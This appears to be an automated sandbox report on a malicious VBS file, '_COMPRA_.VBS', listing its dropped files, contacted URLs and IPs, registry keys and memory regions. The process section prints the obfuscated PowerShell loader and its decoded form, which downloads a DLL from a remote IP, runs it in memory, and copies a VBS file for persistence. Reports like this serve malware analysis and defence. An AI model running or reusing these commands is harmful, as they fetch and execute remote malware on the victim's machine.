Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
_COMPRA_.VBS
|
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aldovbbj.0fp.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_era3lqvo.5cl.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0rhufd0.t31.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh3x3r0z.4n5.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yb2i5nut.0mf.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpnb2wuj.mn5.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KCOOD8DGHH3SAH4080U5.temp
|
data
|
dropped
|
||
C:\Users\user\Documents\20220514\PowerShell_transcript.035347.PDp+ZyLV.20220514152147.txt
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\20220514\PowerShell_transcript.035347.yPH19KjK.20220514152144.txt
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\20220514\PowerShell_transcript.035347.z_SSE0i6.20220514152153.txt
|
UTF-8 Unicode (with BOM) text, with CRLF line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\_COMPRA_.VBS"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwBuAG???AdwAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AaABnAH???AdQByAHQAdAAvADEANwAxAC4AOAAxAC4AMwAzADEALgA1ADkAMQAvAC8AOgBwAHQAdABoACcAKQApAA==';$OWjuxD
= [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe
-windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command
"[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/new.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null,
[object[]] ('txt.hguurtt/171.81.331.591//:ptth'))
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Copy-Item -Path C:\Windows\Temp\*.vbs -Destination C:\ProgramData\Done.vbs
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://20.106.232.4/rumpe/newrumpe.pdf
|
20.106.232.4
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://195.133.18.171
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://195.133.18.171x
|
unknown
|
||
http://20.106.232.4/dll/new.pdf
|
20.106.232.4
|
||
http://20.106.232.48
|
unknown
|
||
http://20.106.232.4x
|
unknown
|
||
http://20.106.232.4
|
unknown
|
||
http://195.133.18.171/ttruugh.txt
|
unknown
|
||
http://crl.microq
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
20.106.232.4
|
unknown
|
United States
|
||
195.133.18.171
|
unknown
|
Russian Federation
|
||
192.168.2.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
19035B14000
|
heap
|
page read and write
|
||
20DBA995000
|
trusted library allocation
|
page read and write
|
||
20DABE9C000
|
trusted library allocation
|
page read and write
|
||
19035B8F000
|
heap
|
page read and write
|
||
2E93FA05000
|
heap
|
page read and write
|
||
7FFC01490000
|
trusted library allocation
|
page read and write
|
||
20DC2970000
|
trusted library allocation
|
page read and write
|
||
19035B7D000
|
heap
|
page read and write
|
||
FD710FB000
|
stack
|
page read and write
|
||
2427BD00000
|
trusted library allocation
|
page read and write
|
||
3BA99FE000
|
stack
|
page read and write
|
||
2427BC9E000
|
heap
|
page read and write
|
||
15ED9DE0000
|
trusted library allocation
|
page read and write
|
||
15ED9F19000
|
heap
|
page read and write
|
||
1DD54CC0000
|
heap
|
page read and write
|
||
20DC2A98000
|
heap
|
page read and write
|
||
1569CA20000
|
heap
|
page read and write
|
||
7FFC010ED000
|
trusted library allocation
|
page execute and read and write
|
||
15EC1CE0000
|
trusted library allocation
|
page read and write
|
||
2489A064000
|
heap
|
page read and write
|
||
3BA9CFF000
|
stack
|
page read and write
|
||
AED597F000
|
stack
|
page read and write
|
||
211D8830000
|
heap
|
page read and write
|
||
20DA8A5F000
|
heap
|
page read and write
|
||
2427BCF0000
|
heap
|
page execute and read and write
|
||
11329302000
|
heap
|
page read and write
|
||
20DABEA5000
|
trusted library allocation
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
1DD5A450000
|
trusted library allocation
|
page read and write
|
||
1DD55704000
|
heap
|
page read and write
|
||
1903547C000
|
heap
|
page read and write
|
||
7FFC01390000
|
trusted library allocation
|
page read and write
|
||
211D8884000
|
heap
|
page read and write
|
||
20DC2B50000
|
heap
|
page read and write
|
||
1DD5A328000
|
trusted library allocation
|
page read and write
|
||
1DD54E78000
|
heap
|
page read and write
|
||
242014C1000
|
trusted library allocation
|
page read and write
|
||
AED547E000
|
stack
|
page read and write
|
||
15EBFEAE000
|
heap
|
page read and write
|
||
24279C4C000
|
heap
|
page read and write
|
||
1569C866000
|
heap
|
page read and write
|
||
20DC27F7000
|
heap
|
page read and write
|
||
11329313000
|
heap
|
page read and write
|
||
F77E0FF000
|
stack
|
page read and write
|
||
19035B8E000
|
heap
|
page read and write
|
||
20DC2ABB000
|
heap
|
page read and write
|
||
286107D000
|
stack
|
page read and write
|
||
1B56A3C0000
|
trusted library allocation
|
page read and write
|
||
4A4EA7D000
|
stack
|
page read and write
|
||
F77D67B000
|
stack
|
page read and write
|
||
15ED9F21000
|
heap
|
page read and write
|
||
7FFC013C0000
|
trusted library allocation
|
page read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
19035BB4000
|
heap
|
page read and write
|
||
7FFC01190000
|
trusted library allocation
|
page read and write
|
||
7FFC012D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC013B0000
|
trusted library allocation
|
page read and write
|
||
15EBFDC0000
|
heap
|
page read and write
|
||
211D887A000
|
heap
|
page read and write
|
||
190354F7000
|
heap
|
page read and write
|
||
15EC22F2000
|
trusted library allocation
|
page read and write
|
||
20DAB81C000
|
trusted library allocation
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
1DD54F02000
|
heap
|
page read and write
|
||
7FFC01450000
|
trusted library allocation
|
page read and write
|
||
15ED9E10000
|
trusted library allocation
|
page read and write
|
||
CD934FE000
|
stack
|
page read and write
|
||
20DAB847000
|
trusted library allocation
|
page read and write
|
||
21780858000
|
heap
|
page read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
C13B7B000
|
stack
|
page read and write
|
||
4A4E877000
|
stack
|
page read and write
|
||
7FFC013F0000
|
trusted library allocation
|
page read and write
|
||
1DD5A320000
|
trusted library allocation
|
page read and write
|
||
10CAFFF000
|
stack
|
page read and write
|
||
20DC2920000
|
trusted library allocation
|
page read and write
|
||
2427BD9D000
|
heap
|
page read and write
|
||
7FFC011E6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC013F0000
|
trusted library allocation
|
page read and write
|
||
21780800000
|
heap
|
page read and write
|
||
1B56A508000
|
heap
|
page read and write
|
||
19035454000
|
heap
|
page read and write
|
||
3BA977E000
|
stack
|
page read and write
|
||
20DBA7F1000
|
trusted library allocation
|
page read and write
|
||
19035B0A000
|
heap
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
63E5A7B000
|
stack
|
page read and write
|
||
28560C40000
|
heap
|
page read and write
|
||
2489A04D000
|
heap
|
page read and write
|
||
211D884F000
|
heap
|
page read and write
|
||
7FFC011B6000
|
trusted library allocation
|
page read and write
|
||
15EBFDC9000
|
heap
|
page read and write
|
||
7FFC01335000
|
trusted library allocation
|
page read and write
|
||
7FFC011C0000
|
trusted library allocation
|
page execute and read and write
|
||
2E941CB6000
|
heap
|
page read and write
|
||
20DC29C0000
|
trusted library allocation
|
page read and write
|
||
7FFC01113000
|
trusted library allocation
|
page read and write
|
||
EE683FE000
|
stack
|
page read and write
|
||
19035B7B000
|
heap
|
page read and write
|
||
20DC2940000
|
trusted library allocation
|
page read and write
|
||
20DC3100000
|
trusted library allocation
|
page read and write
|
||
2427BBB0000
|
heap
|
page read and write
|
||
242014B9000
|
trusted library allocation
|
page read and write
|
||
2038897F000
|
heap
|
page read and write
|
||
15ED9F32000
|
heap
|
page read and write
|
||
7FFC01350000
|
trusted library allocation
|
page read and write
|
||
15EC1D6F000
|
trusted library allocation
|
page read and write
|
||
15EBFE1D000
|
heap
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
19035B9C000
|
heap
|
page read and write
|
||
7FFC01300000
|
trusted library allocation
|
page read and write
|
||
20DC3300000
|
trusted library allocation
|
page read and write
|
||
15EC1780000
|
trusted library allocation
|
page read and write
|
||
20DC2AF8000
|
heap
|
page read and write
|
||
2489A027000
|
heap
|
page read and write
|
||
2490605A000
|
heap
|
page read and write
|
||
20DBA852000
|
trusted library allocation
|
page read and write
|
||
1DD5A32E000
|
trusted library allocation
|
page read and write
|
||
19035B7B000
|
heap
|
page read and write
|
||
20DC30E0000
|
trusted library allocation
|
page read and write
|
||
20DC2991000
|
trusted library allocation
|
page read and write
|
||
7FFC01300000
|
trusted library allocation
|
page read and write
|
||
20DAA494000
|
trusted library allocation
|
page read and write
|
||
20DABCAF000
|
trusted library allocation
|
page read and write
|
||
20DC3220000
|
trusted library allocation
|
page read and write
|
||
21781002000
|
trusted library allocation
|
page read and write
|
||
1DD55700000
|
heap
|
page read and write
|
||
19035400000
|
heap
|
page read and write
|
||
CD9377A000
|
stack
|
page read and write
|
||
3BA967F000
|
stack
|
page read and write
|
||
20DA8AA0000
|
heap
|
page read and write
|
||
2E93FA36000
|
heap
|
page read and write
|
||
24279B00000
|
heap
|
page read and write
|
||
19035B71000
|
heap
|
page read and write
|
||
211D8849000
|
heap
|
page read and write
|
||
3BA938E000
|
stack
|
page read and write
|
||
1DD54F14000
|
heap
|
page read and write
|
||
1DD5A344000
|
trusted library allocation
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
20DC29C0000
|
trusted library allocation
|
page read and write
|
||
19035B75000
|
heap
|
page read and write
|
||
2E941D54000
|
heap
|
page read and write
|
||
24210010000
|
trusted library allocation
|
page read and write
|
||
7FFC01330000
|
trusted library allocation
|
page read and write
|
||
190354B5000
|
heap
|
page read and write
|
||
211D882F000
|
heap
|
page read and write
|
||
CD9327E000
|
stack
|
page read and write
|
||
1569CB95000
|
heap
|
page read and write
|
||
286117E000
|
stack
|
page read and write
|
||
24899FE0000
|
trusted library allocation
|
page read and write
|
||
190354A4000
|
heap
|
page read and write
|
||
19035B7D000
|
heap
|
page read and write
|
||
15ED9F21000
|
heap
|
page read and write
|
||
1DD54E88000
|
heap
|
page read and write
|
||
211D883B000
|
heap
|
page read and write
|
||
2E9418E6000
|
heap
|
page read and write
|
||
20DC3160000
|
trusted library allocation
|
page read and write
|
||
2E9418D6000
|
heap
|
page read and write
|
||
7FFC01420000
|
trusted library allocation
|
page read and write
|
||
15EBFE0B000
|
heap
|
page read and write
|
||
1DD54C60000
|
heap
|
page read and write
|
||
1DD56180000
|
trusted library allocation
|
page read and write
|
||
2E93FA08000
|
heap
|
page read and write
|
||
24210062000
|
trusted library allocation
|
page read and write
|
||
2E9418F0000
|
heap
|
page read and write
|
||
113292CB000
|
heap
|
page read and write
|
||
1DD54E13000
|
heap
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
19035B71000
|
heap
|
page read and write
|
||
7FFC01320000
|
trusted library allocation
|
page read and write
|
||
19036002000
|
heap
|
page read and write
|
||
3BA9B7E000
|
stack
|
page read and write
|
||
1903544E000
|
heap
|
page read and write
|
||
20DC3130000
|
trusted library allocation
|
page read and write
|
||
2427B570000
|
heap
|
page readonly
|
||
15EBFEBC000
|
heap
|
page read and write
|
||
2427BC3C000
|
heap
|
page read and write
|
||
AED577E000
|
stack
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
7FFC01220000
|
trusted library allocation
|
page execute and read and write
|
||
1569C870000
|
heap
|
page read and write
|
||
7FFC012E2000
|
trusted library allocation
|
page read and write
|
||
203888A0000
|
heap
|
page read and write
|
||
1DD5A61E000
|
heap
|
page read and write
|
||
7FFC01340000
|
trusted library allocation
|
page read and write
|
||
19035BA8000
|
heap
|
page read and write
|
||
20DAB87D000
|
trusted library allocation
|
page read and write
|
||
7FFC010F0000
|
trusted library allocation
|
page read and write
|
||
2427BD40000
|
heap
|
page read and write
|
||
2427BBC0000
|
heap
|
page read and write
|
||
1DD5A570000
|
trusted library allocation
|
page read and write
|
||
2427BCE0000
|
trusted library allocation
|
page read and write
|
||
7FFC01420000
|
trusted library allocation
|
page read and write
|
||
F77DEFF000
|
stack
|
page read and write
|
||
2D584D13000
|
heap
|
page read and write
|
||
63E597C000
|
stack
|
page read and write
|
||
1B56A470000
|
heap
|
page read and write
|
||
15ED9EC7000
|
heap
|
page read and write
|
||
15EC2295000
|
trusted library allocation
|
page read and write
|
||
1DD5A3F0000
|
trusted library allocation
|
page read and write
|
||
20DA8AC0000
|
heap
|
page read and write
|
||
21780859000
|
heap
|
page read and write
|
||
EE679EA000
|
stack
|
page read and write
|
||
24200B78000
|
trusted library allocation
|
page read and write
|
||
2E9418E3000
|
heap
|
page read and write
|
||
20DA8B65000
|
heap
|
page read and write
|
||
C13A7E000
|
stack
|
page read and write
|
||
203896C0000
|
trusted library allocation
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
19035B7D000
|
heap
|
page read and write
|
||
19035B72000
|
heap
|
page read and write
|
||
20DC3350000
|
trusted library allocation
|
page read and write
|
||
28560BB0000
|
trusted library allocation
|
page read and write
|
||
7FFC012B4000
|
trusted library allocation
|
page read and write
|
||
211D8847000
|
heap
|
page read and write
|
||
15EC1C68000
|
trusted library allocation
|
page read and write
|
||
1DD54C50000
|
heap
|
page read and write
|
||
190354C7000
|
heap
|
page read and write
|
||
15EC1CA7000
|
trusted library allocation
|
page read and write
|
||
2E93FA36000
|
heap
|
page read and write
|
||
1DD555F0000
|
trusted library allocation
|
page read and write
|
||
113291D0000
|
trusted library allocation
|
page read and write
|
||
211D8E60000
|
trusted library allocation
|
page read and write
|
||
19035457000
|
heap
|
page read and write
|
||
20388910000
|
trusted library allocation
|
page read and write
|
||
7FFC01370000
|
trusted library allocation
|
page read and write
|
||
1569CB90000
|
heap
|
page read and write
|
||
20DA8B30000
|
heap
|
page readonly
|
||
2CA42FF000
|
stack
|
page read and write
|
||
20DC3170000
|
trusted library allocation
|
page read and write
|
||
2E941A9A000
|
heap
|
page read and write
|
||
1569C875000
|
heap
|
page read and write
|
||
15ED9F32000
|
heap
|
page read and write
|
||
19035B72000
|
heap
|
page read and write
|
||
15EC1FC8000
|
trusted library allocation
|
page read and write
|
||
2489A113000
|
heap
|
page read and write
|
||
2860E75000
|
stack
|
page read and write
|
||
1DD5A6FA000
|
heap
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
20DC30C0000
|
trusted library allocation
|
page read and write
|
||
24200B6F000
|
trusted library allocation
|
page read and write
|
||
1DD5A649000
|
heap
|
page read and write
|
||
2D584C02000
|
heap
|
page read and write
|
||
1DD5A600000
|
heap
|
page read and write
|
||
1DD55759000
|
heap
|
page read and write
|
||
7DF4B12B0000
|
trusted library allocation
|
page execute and read and write
|
||
3BA93CF000
|
stack
|
page read and write
|
||
7FFC01310000
|
trusted library allocation
|
page read and write
|
||
20DABCB8000
|
trusted library allocation
|
page read and write
|
||
286127A000
|
stack
|
page read and write
|
||
20DC31F0000
|
trusted library allocation
|
page read and write
|
||
15EC2284000
|
trusted library allocation
|
page read and write
|
||
20DAB59E000
|
trusted library allocation
|
page read and write
|
||
2E9418F9000
|
heap
|
page read and write
|
||
20DA8B20000
|
trusted library allocation
|
page read and write
|
||
7FFC01450000
|
trusted library allocation
|
page read and write
|
||
2E9419D6000
|
heap
|
page read and write
|
||
19035413000
|
heap
|
page read and write
|
||
113290D0000
|
heap
|
page read and write
|
||
2CA44F8000
|
stack
|
page read and write
|
||
7FFC01340000
|
trusted library allocation
|
page read and write
|
||
19035B76000
|
heap
|
page read and write
|
||
1DD5A360000
|
trusted library allocation
|
page read and write
|
||
286214D000
|
stack
|
page read and write
|
||
2178085A000
|
heap
|
page read and write
|
||
15EDA14C000
|
heap
|
page read and write
|
||
EB3356B000
|
stack
|
page read and write
|
||
2860EFE000
|
stack
|
page read and write
|
||
2178085C000
|
heap
|
page read and write
|
||
20DAB826000
|
trusted library allocation
|
page read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
20DC29B0000
|
trusted library allocation
|
page read and write
|
||
7FFC012F0000
|
trusted library allocation
|
page execute and read and write
|
||
20DAA85C000
|
trusted library allocation
|
page read and write
|
||
20DAB875000
|
trusted library allocation
|
page read and write
|
||
211D882E000
|
heap
|
page read and write
|
||
CD935FE000
|
stack
|
page read and write
|
||
7FFC01100000
|
trusted library allocation
|
page read and write
|
||
2421006E000
|
trusted library allocation
|
page read and write
|
||
2427BD10000
|
trusted library allocation
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
1DD5A341000
|
trusted library allocation
|
page read and write
|
||
20388930000
|
heap
|
page read and write
|
||
2E93FA25000
|
heap
|
page read and write
|
||
2E93FA07000
|
heap
|
page read and write
|
||
2E941C6E000
|
heap
|
page read and write
|
||
20388750000
|
trusted library allocation
|
page read and write
|
||
EE685FB000
|
stack
|
page read and write
|
||
24200211000
|
trusted library allocation
|
page read and write
|
||
1569C896000
|
heap
|
page read and write
|
||
20DABC84000
|
trusted library allocation
|
page read and write
|
||
15ED9F4F000
|
heap
|
page read and write
|
||
20DC3390000
|
trusted library allocation
|
page read and write
|
||
24200B67000
|
trusted library allocation
|
page read and write
|
||
1DD5A6E9000
|
heap
|
page read and write
|
||
3BA9A7E000
|
stack
|
page read and write
|
||
1903544D000
|
heap
|
page read and write
|
||
20DC2A24000
|
heap
|
page read and write
|
||
24279A70000
|
heap
|
page read and write
|
||
24899E80000
|
heap
|
page read and write
|
||
1569C885000
|
heap
|
page read and write
|
||
20DC32A0000
|
trusted library allocation
|
page read and write
|
||
20388BD0000
|
heap
|
page read and write
|
||
1DD5A350000
|
trusted library allocation
|
page read and write
|
||
15ED9E00000
|
trusted library allocation
|
page read and write
|
||
2427B6D5000
|
heap
|
page read and write
|
||
EB33C7E000
|
stack
|
page read and write
|
||
1B56A43C000
|
heap
|
page read and write
|
||
63E555C000
|
stack
|
page read and write
|
||
19035B14000
|
heap
|
page read and write
|
||
7FFC012BC000
|
trusted library allocation
|
page read and write
|
||
1569C877000
|
heap
|
page read and write
|
||
1DD5A6D8000
|
heap
|
page read and write
|
||
21780770000
|
heap
|
page read and write
|
||
7FFC01380000
|
trusted library allocation
|
page read and write
|
||
19035B8C000
|
heap
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
15ED9F4F000
|
heap
|
page read and write
|
||
3BA96FF000
|
stack
|
page read and write
|
||
15ED9E00000
|
trusted library allocation
|
page read and write
|
||
20DC29A0000
|
trusted library allocation
|
page read and write
|
||
7FFC012C2000
|
trusted library allocation
|
page read and write
|
||
CD9347E000
|
stack
|
page read and write
|
||
F77DAFF000
|
stack
|
page read and write
|
||
7FFC012B1000
|
trusted library allocation
|
page read and write
|
||
20DBAA07000
|
trusted library allocation
|
page read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
15ED9F49000
|
heap
|
page read and write
|
||
20DAA7F1000
|
trusted library allocation
|
page read and write
|
||
43E6F7B000
|
stack
|
page read and write
|
||
15EC20F2000
|
trusted library allocation
|
page read and write
|
||
1DD5A480000
|
remote allocation
|
page read and write
|
||
20DC33C0000
|
trusted library allocation
|
page read and write
|
||
2E93FA06000
|
heap
|
page read and write
|
||
21780813000
|
heap
|
page read and write
|
||
19036021000
|
heap
|
page read and write
|
||
24279BA8000
|
heap
|
page read and write
|
||
2178088A000
|
heap
|
page read and write
|
||
20389710000
|
trusted library allocation
|
page read and write
|
||
19035B7B000
|
heap
|
page read and write
|
||
211D8700000
|
heap
|
page read and write
|
||
2E93F910000
|
heap
|
page read and write
|
||
10CB4FD000
|
stack
|
page read and write
|
||
24899EE0000
|
heap
|
page read and write
|
||
20DC2940000
|
trusted library allocation
|
page read and write
|
||
20DC3400000
|
trusted library allocation
|
page read and write
|
||
19035B98000
|
heap
|
page read and write
|
||
20DC2970000
|
trusted library allocation
|
page read and write
|
||
21780913000
|
heap
|
page read and write
|
||
2427BBA4000
|
trusted library allocation
|
page read and write
|
||
2427B6A0000
|
heap
|
page execute and read and write
|
||
2427BCD0000
|
trusted library allocation
|
page read and write
|
||
20DC29C0000
|
trusted library allocation
|
page read and write
|
||
19035B96000
|
heap
|
page read and write
|
||
7FFC01300000
|
trusted library allocation
|
page read and write
|
||
20DAAA02000
|
trusted library allocation
|
page read and write
|
||
2861337000
|
stack
|
page read and write
|
||
11329A02000
|
heap
|
page read and write
|
||
19035B8E000
|
heap
|
page read and write
|
||
19035B1C000
|
heap
|
page read and write
|
||
24279C49000
|
heap
|
page read and write
|
||
211D8869000
|
heap
|
page read and write
|
||
7FFC013E0000
|
trusted library allocation
|
page read and write
|
||
7FFC01100000
|
trusted library allocation
|
page read and write
|
||
2178083C000
|
heap
|
page read and write
|
||
19035B7B000
|
heap
|
page read and write
|
||
19035BB9000
|
heap
|
page read and write
|
||
2E94198E000
|
heap
|
page read and write
|
||
1DD5A430000
|
trusted library allocation
|
page read and write
|
||
20DAA490000
|
trusted library allocation
|
page read and write
|
||
20DC2B00000
|
heap
|
page read and write
|
||
20DAA4A5000
|
heap
|
page read and write
|
||
19036002000
|
heap
|
page read and write
|
||
24201547000
|
trusted library allocation
|
page read and write
|
||
7FFC01410000
|
trusted library allocation
|
page read and write
|
||
20DC2990000
|
trusted library allocation
|
page read and write
|
||
2427B5B0000
|
heap
|
page execute and read and write
|
||
2489A048000
|
heap
|
page read and write
|
||
7FFC011E6000
|
trusted library allocation
|
page execute and read and write
|
||
CD939FB000
|
stack
|
page read and write
|
||
19035B6F000
|
heap
|
page read and write
|
||
20DAB8A3000
|
trusted library allocation
|
page read and write
|
||
1DD5A3F0000
|
trusted library allocation
|
page read and write
|
||
24906102000
|
heap
|
page read and write
|
||
2E94188E000
|
heap
|
page read and write
|
||
1DD5A3F0000
|
trusted library allocation
|
page read and write
|
||
15EC20E1000
|
trusted library allocation
|
page read and write
|
||
20DABEBA000
|
trusted library allocation
|
page read and write
|
||
EE67DFE000
|
stack
|
page read and write
|
||
20388980000
|
heap
|
page read and write
|
||
15EBFD50000
|
heap
|
page read and write
|
||
211D8829000
|
heap
|
page read and write
|
||
2D584C13000
|
heap
|
page read and write
|
||
20DC2981000
|
trusted library allocation
|
page read and write
|
||
4A4E97E000
|
stack
|
page read and write
|
||
19035B9A000
|
heap
|
page read and write
|
||
190351B0000
|
heap
|
page read and write
|
||
20DC2A00000
|
heap
|
page read and write
|
||
1DD54E6E000
|
heap
|
page read and write
|
||
15EBFDB0000
|
heap
|
page read and write
|
||
7FFC0111C000
|
trusted library allocation
|
page read and write
|
||
11329229000
|
heap
|
page read and write
|
||
19035B72000
|
heap
|
page read and write
|
||
1DD5A616000
|
heap
|
page read and write
|
||
7DF496E30000
|
trusted library allocation
|
page execute and read and write
|
||
2427BCF7000
|
heap
|
page execute and read and write
|
||
19035B9B000
|
heap
|
page read and write
|
||
211D8902000
|
heap
|
page read and write
|
||
1DD54E99000
|
heap
|
page read and write
|
||
7FFC01310000
|
trusted library allocation
|
page read and write
|
||
20DC3190000
|
trusted library allocation
|
page read and write
|
||
203896B0000
|
trusted library allocation
|
page read and write
|
||
1DD5A470000
|
trusted library allocation
|
page read and write
|
||
F77DDFF000
|
stack
|
page read and write
|
||
15EBFEBC000
|
heap
|
page read and write
|
||
2427BC63000
|
heap
|
page read and write
|
||
1DD5A6F6000
|
heap
|
page read and write
|
||
7FFC01440000
|
trusted library allocation
|
page read and write
|
||
7FFC013E0000
|
trusted library allocation
|
page read and write
|
||
1569C7D0000
|
heap
|
page read and write
|
||
20388998000
|
heap
|
page read and write
|
||
15EDA14C000
|
heap
|
page read and write
|
||
1569C850000
|
heap
|
page read and write
|
||
20DC2970000
|
trusted library allocation
|
page read and write
|
||
7FFC013C0000
|
trusted library allocation
|
page read and write
|
||
190354AB000
|
heap
|
page read and write
|
||
20DC2B5C000
|
heap
|
page read and write
|
||
2427BCD0000
|
trusted library allocation
|
page read and write
|
||
1B56A447000
|
heap
|
